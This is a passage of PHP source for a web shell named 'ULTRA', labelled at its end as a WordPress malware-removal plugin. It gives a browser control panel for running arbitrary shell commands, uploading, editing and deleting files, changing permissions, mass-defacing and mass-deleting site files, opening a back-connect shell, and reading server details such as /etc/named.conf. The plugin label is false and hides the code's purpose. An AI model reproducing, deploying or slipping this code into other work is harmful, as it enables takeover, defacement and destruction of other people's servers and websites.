echo '<form action="" method="post">'; echo '<div class="mb-3">'; echo '<label class="form-label">Directory</label>'; echo "<input type='text' class='form-control' name='massDel' value='{$path}'>"; echo '</div>'; echo '<div class="mb-3">'; echo '<label class="form-label">File Name</label>'; echo '<input type="text" class="form-control" name="massDelName" placeholder="test.php">'; echo '</div>'; echo '<button class="btn btn-outline-light" type="submit">Submit</button>'; echo '</form>'; echo '</div>'; } } // Mail test function mailer($serv) { if (isset($_POST['mail1'])) { $rand = rand(1, 9999); mail($_POST['mail1'], "Report Test " . $serv . " - " . $rand, "WORKING !"); echo "<center>------- Result -------</center>"; echo '<div class="card text-dark col-md-7 mb-3 mt-2">'; echo "<pre>Done ~~<br><br>"; echo "Send an report to [" . $_POST['mail1'] . "] - Order : {$rand}</b>"; echo '</pre></div>'; } else { echo '<!-- mail test --> '; echo '<div class="col-md-5">'; echo '<form action="" method="post">'; echo '<div class="mb-3">'; echo '<label for="name" class="form-label">Email</label>'; echo '<input type="email" class="form-control" name="mail1" placeholder="email@mail.com">'; echo '</div>'; echo '<button class="btn btn-outline-light" type="submit">Submit</button>'; echo '</form>'; } } if (isset($_POST['newFolderName'])) { if (mkdir($path . '/' . $_POST['newFolderName'])) { flash("Create Folder Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Create Folder Failed", "Failed", "error", "?dir={$path}"); } } if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { if (file_put_contents($_POST['newFileName'], $_POST['newFileContent'])) { flash("Create File Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Create File Failed", "Failed", "error", "?dir={$path}"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir={$path}"); } if (rename($path . '/' . $_GET['item'], $_POST['newName'])) { flash("Rename Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Rename Failed", "Failed", "error", "?dir={$path}"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { if (file_put_contents($path . '/' . $_GET['item'], $_POST['newContent'])) { flash("Edit Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Edit Failed", "Failed", "error", "?dir={$path}"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir={$path}"); } if (chmod($path . '/' . $_GET['item'], $_POST['newPerm'])) { flash("Change Permission Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Change Permission", "Failed", "error", "?dir={$path}"); } } if (isset($_GET['action'])) { $action = $_GET['action']; if ($action == 'delete' && isset($_GET['item'])) { function removedir($dir) { if (!rmdir($dir)) { $file = scandir($dir); foreach ($file as $files) { if (is_file($dir . "/" . $files)) { if (unlink($dir . "/" . $files)) { rmdir($dir); } } if (is_dir($dir . "/" . $files)) { rmdir($dir . "/" . $files); rmdir($dir); } } } } if (is_dir($_GET['item'])) { if (removedir($_GET['item'])) { flash("Delete Folder Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Delete Folder Successfully!", "Success", "success", "?dir={$path}"); } } else { if (unlink($_GET['item'])) { flash("Delete File Successfully!", "Success", "success", "?dir={$path}"); } else { flash("Delete File Failed", "Failed", "error", "?dir={$path}"); } } } } if (isset($_FILES['uploadfile'])) { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { flash("Upload File Successfully! ", "Success", "success", "?dir={$path}"); } else { flash("Upload Failed", "Failed", "error", "?dir={$path}"); } } else { if ($mainupload) { flash("Upload {$i} Files Successfully! ", "Success", "success", "?dir={$path}"); } else { flash("Upload Failed", "Failed", "error", "?dir={$path}"); } } } $dirs = scandir($path); $d0mains = @file("/etc/named.conf", false); if (!$d0mains) { $dom = "Cant read /etc/named.conf"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count} Domain"; } $ip = gethostbyname($_SERVER['HTTP_HOST']); $uip = $_SERVER['REMOTE_ADDR']; $serv = $_SERVER['HTTP_HOST']; $soft = $_SERVER['SERVER_SOFTWARE']; $cmd_uname = cmd("uname -a"); $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : 'Uname Error!'); ?> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous" /> <title>ULTRA [ <?php echo $serv; ?> ]</title> <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono" rel="stylesheet"> <style type="text/css"> * { font-family: Ubuntu Mono; } a { text-decoration: none; color: white; } a:hover { color: white; } /* width */ ::-webkit-scrollbar { width: 7px; height: 7px; } /* Handle */ ::-webkit-scrollbar-thumb { background: grey; border-radius: 7px; } /* Track */ ::-webkit-scrollbar-track { box-shadow: inset 0 0 7px grey; border-radius: 7px; } .td-break { word-break: break-all } </style> </head> <body class="bg-dark text-light"> <div class="container-fluid"> <div class="py-3" id="main"> <div class="p-4 rounded-3"> <table class="table table-borderless text-light"> <tr> <td style="width: 7%;">Operation</td> <td style="width: 1%">:</td> <td><?php echo $uname; ?></td> </tr> <tr> <td style="width: 7%;">Software</td> <td style="width: 1%">:</td> <td><?php echo $soft; ?></td> </tr> <tr> <td style="width: 7%;">Server IP</td> <td style="width: 1%">:</td> <td><?php echo $ip; ?> | Your IP: <?php echo $uip; ?></td> </tr> <tr> <td style="width: 7%;">Domains</td> <td style="width: 1%">:</td> <td><?php echo $dom; ?></td> </tr> <tr> <td style="width: 7%;">Permission</td> <td style="width: 1%">:</td> <td>[ <?php echo writable($path, perms($path)); ?> ]</td> </tr> </table> <div class="p-2"> <i class="fa fa fa-folder pt-1"></i>  <?php foreach ($exdir as $id => $pat) { if ($pat == '' && $id == 0) { ?> <a href="?dir=/" class="text-decoration-none text-light">/</a> <?php } if ($pat == '') { continue; } ?> <a href="?dir=<?php for ($i = 0; $i <= $id; $i++) { echo "{$exdir[$i]}"; if ($i != $id) { echo "/"; } } ?>" class="text-decoration-none text-light"><?php echo $pat; ?></a> <span class="text-light"> /</span> <!-- endforeach --> <?php } ?> </div> <!-- configuration fiture --> <div id="tools"> <center> <hr width='20%'> </center> <div class="d-flex justify-content-center flex-wrap my-3"> <a href="?" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-home"></i> Home</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=upload" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-upload"></i> Upload</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=command" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-terminal"></i> Command</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=massdeface" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-layer-group"></i> Mass Deface</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=massdelete" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-eraser"></i> Mass Delete</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=mail" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-envelope"></i> Email Test</a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=backconnect" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-network-wired"></i> Back Connect</a> </div> <center> <hr width='20%'> </center> <div class="container" id="tools"> <!-- endif --> <?php if (isset($_GET['action']) && $_GET['action'] != 'download') { $action = $_GET['action']; ?> <?php } ?> <?php if (isset($_GET['action']) && $_GET['action'] != 'delete') { $action = $_GET['action']; ?> <div class="col-md-12"> <div class="row justify-content-center"> <?php if ($action == 'rename' && isset($_GET['item'])) { ?> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label">New Name</label> <input type="text" class="form-control" name="newName" value="<?php echo $_GET['item']; ?>"> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> </div> <?php } elseif ($action == 'edit' && isset($_GET['item'])) { ?> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?php echo $_GET['item']; ?></label> <textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?php echo htmlspecialchars(file_get_contents($path . '/' . $_GET['item'])); ?></textarea> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> </div> <?php } elseif ($action == 'chmod' && isset($_GET['item'])) { ?> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?php echo $_GET['item']; ?></label> <input type="text" class="form-control" name="newPerm" value="<?php echo substr(sprintf('%o', fileperms($_GET['item'])), 4); ?>"> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> </div> <?php } elseif ($action == 'upload') { ?> <div class="col-md-5"> <form action="" method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">File Uploader</label> <div class="input-group"> <input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload" multiple> <button class="btn btn-outline-light" type="submit" id="inputGroupFileAddon04">Upload</button> </div> </div> </form> </div> <?php } elseif ($action == 'command') { ?> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label class="form-label">Command</label> <div class="input-group"> <input type="text" class="form-control form-control-sm" name="ucmd" placeholder="whoami"> <button class="btn btn-outline-light" type="submit">Submit</button> </div> </div> </form> </div> <?php } elseif ($action == 'massdeface') { ?> <?php massdeface($path); ?> <?php } elseif ($action == 'massdelete') { ?> <?php massdelete($path); ?> <?php } elseif ($action == 'mail') { ?> <?php mailer($serv); ?> <?php } elseif ($action == 'backconnect') { ?> <div class="col-md-5"> <!-- end php --> <?php bctool(); ?> </div> <!-- endif --> <?php } ?> </div> </div> <!-- endif --> <?php } ?> <!-- command --> <?php if (isset($_POST['ucmd'])) { ?> <div class="p-2"> <div class="row justify-content-center"> <div class="card text-dark col-md-7 mb-3"> <pre><?php echo $ip . "@" . $serv . ": ~\$ "; echo $cmd = $_POST['ucmd']; $cmd . "<br>"; ?><br><br><code><?php echo cmd($cmd); ?></code></pre> </div> </div> </div> <!-- endif --> <?php } ?> <!-- new file --> <div class="col-md-12"> <div class="collapse" id="newFileCollapse" data-bs-parent="#tools"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label class="form-label">File Name</label> <input type="text" class="form-control" name="newFileName" placeholder="test.php"> </div> <div class="mb-3"> <label class="form-label">File Content</label> <textarea class="form-control" rows="7" name="newFileContent" placeholder="Hello-World"></textarea> </div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> <!-- new folder --> <div class="col-md-12"> <div class="collapse" id="newFolderCollapse" data-bs-parent="#tools"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label class="form-label">Folder Name</label> <input type="text" class="form-control" name="newFolderName" placeholder="home"> </div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> </div> </div> <!-- file manager --> <div class="table-responsive mt-3"> <table class="table table-hover table-dark align-middle text-light"> <thead class="align-middle"> <tr> <td style="width:35%">Name</td> <td style="width:10%">Type</td> <td style="width:10%">Size</td> <td style="width:13%">Owner/Group</td> <td style="width:10%">Permission</td> <td style="width:13%">Last Modified</td> <td style="width:9%">Actions</td> </tr> </thead> <tbody class="text-nowrap"> <!-- end php --> <?php foreach ($dirs as $dir) { if (!is_dir($dir)) { continue; } ?> <tr> <td> <?php if ($dir === '..') { ?> <a href="?dir=<?php echo dirname($path); ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?php echo $dir; ?></a> <?php } elseif ($dir === '.') { ?> <a href="?dir=<?php echo $path; ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?php echo $dir; ?></a> <?php } else { ?> <a href="?dir=<?php echo $path . '/' . $dir; ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?php echo $dir; ?></a> <!-- endif --> <?php } ?> </td> <td class="text-light"><?php echo filetype($dir); ?></td> <td class="text-light">-</td> <td class="text-light"><?php echo getOwner($dir); ?></td> <td class="text-light"> <!-- end php --> <?php echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">'; if (is_writable($path . '/' . $dir)) { echo '<font color="lime">'; } elseif (!is_readable($path . '/' . $dir)) { echo '<font color="red">'; } echo perms($path . '/' . $dir); if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) { echo '</a>'; } ?> </td> <td class="text-light"><?php echo date("Y-m-d h:i:s", filemtime($dir)); ?></td> <td> <?php if ($dir != '.' && $dir != '..') { ?> <div class="btn-group"> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a> </div> <?php } elseif ($dir === '.') { ?> <div class="btn-group"> <a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New Folder"><i class="fa fa-folder-plus"></i></a> <a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New File"><i class="fa fa-file-plus"></i></a> </div> <!-- endif --> <?php } ?> </td> </tr> <!-- endforeach --> <?php } ?> <!-- end php --> <?php foreach ($dirs as $dir) { if (!is_file($dir)) { continue; } ?> <tr> <td> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?php echo $dir; ?></a> </td> <td class="text-light"><?php echo function_exists('mime_content_type') ? mime_content_type($dir) : filetype($dir); ?></td> <td class="text-light"><?php echo fsize($dir); ?></td> <td class="text-light"><?php echo getOwner($dir); ?></td> <td class="text-light"> <!-- end php --> <?php echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">'; if (is_writable($path . '/' . $dir)) { echo '<font color="lime">'; } elseif (!is_readable($path . '/' . $dir)) { echo '<font color="red">'; } echo perms($path . '/' . $dir); if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) { echo '</a>'; } ?> </td> <td class="text-light"><?php echo date("Y-m-d h:i:s", filemtime($dir)); ?></td> <td> <?php if ($dir != '.' && $dir != '..') { ?> <div class="btn-group"> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?php echo $path; ?>&item=<?php echo $dir; ?>&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a> </div> <!-- endif --> <?php } ?> </td> </tr> <!-- endforeach --> <?php } ?> </tbody> </table> </div> <center><div class="text-light my-1">© ULTRA</div></center> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script> <script> <?php if (isset($_SESSION['message'])) { ?> Swal.fire( '<?php echo $_SESSION['status']; ?>', '<?php echo $_SESSION['message']; ?>', '<?php echo $_SESSION['class']; ?>' ) <?php } clear(); ?> function deleteConfirm(url) { event.preventDefault() Swal.fire({ title: 'Are you sure?', icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { window.location.href = url } }) } function jscopy() { var jsCopy = document.getElementById("CopyFromTextArea"); jsCopy.focus(); jsCopy.select(); document.execCommand("copy"); } </script> </body> </html><?php }; exit;
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.